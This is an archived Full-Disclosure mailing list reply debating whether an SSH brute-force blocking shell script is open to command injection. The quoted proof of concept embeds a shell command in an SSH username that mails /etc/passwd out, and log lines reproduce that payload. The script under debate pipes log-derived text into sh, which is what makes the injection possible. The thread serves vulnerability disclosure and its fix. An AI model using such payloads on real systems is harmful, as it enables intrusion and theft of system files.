lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <456C5C31.4000002@infiltrated.net>
Date: Tue, 28 Nov 2006 10:56:33 -0500
From: "J. Oquendo" <sil@...iltrated.net>
To: Tavis Ormandy <taviso@...too.org>
Cc: full-disclosure <full-disclosure@...ts.grok.org.uk>,
	Thierry Zoller <Thierry@...ler.lu>
Subject: Re: SSH brute force blocking tool

Tavis Ormandy wrote:
>
> However, it is certainly possible. Here is an example.
>
> #!/bin/sh
> command='$(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@...ts.grok.org.uk)<${x}etc${x}passwd)'
> ssh -o "BatchMode yes" "a a $command"@$1
>
> Which produces log entries like this:
>  
> Nov 28 15:14:15 insomniac sshd[5897]: pam_succeed_if(sshd:auth): error retrieving information about user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@...ts.grok.org.uk)<${x}etc${x}passwd)
> Nov 28 15:14:15 insomniac sshd[5897]: Failed password for invalid user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@...ts.grok.org.uk)<${x}etc${x}passwd) from 127.0.0.1 port 47403 ssh2
>
> Note that the 13th field both contains a dot and is entirely controlled
> by me. This string is placed in /etc/hosts.deny by the script after
> executed by cron.
>
> The $1 in the awk script below is the entire string, which is piped
> unsanitised into /bin/sh:
>
> awk '!/#/ && /\./ && !a[$0]++
> {print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22
> -j REJECT"}' /etc/hosts.deny |\
> awk '/iptables/ && !/#/ && !/-s  -i/'|sh
>
> The results are obvious.
>   

Incorrect did you look at the fix? It isn't unsanitized as you state:

Firstly data being passed is not coming through via /var/log/secure or 
/var/log/auth* its coming in via /etc/hosts.deny

function IPT {

grep -E 
'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' 
/etc/hosts.deny|\
sed 's/::ffff://g'|\
awk '!/#/&&/\./&&!a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d 208.51.101.194 -p TCP 
--dport 22 -j REJECT"}'|\
awk '/iptables/&&!/#/&&!/-s  -i/'|sh

}

[root@...p2 ~]# cat testing.deny
89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44
2383274298734
sakjdhasiuwe
hacker
aaa
bbb
ccc
0wn3d
[root@...p2 ~]# grep -E 
'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}' 
testing.deny
89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44

So the buck stops there before it is put into the shell.



-- 
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net 

The happiness of society is the end of government.
John Adams


Download attachment "smime.p7s" of type "application/x-pkcs7-signature" (5157 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ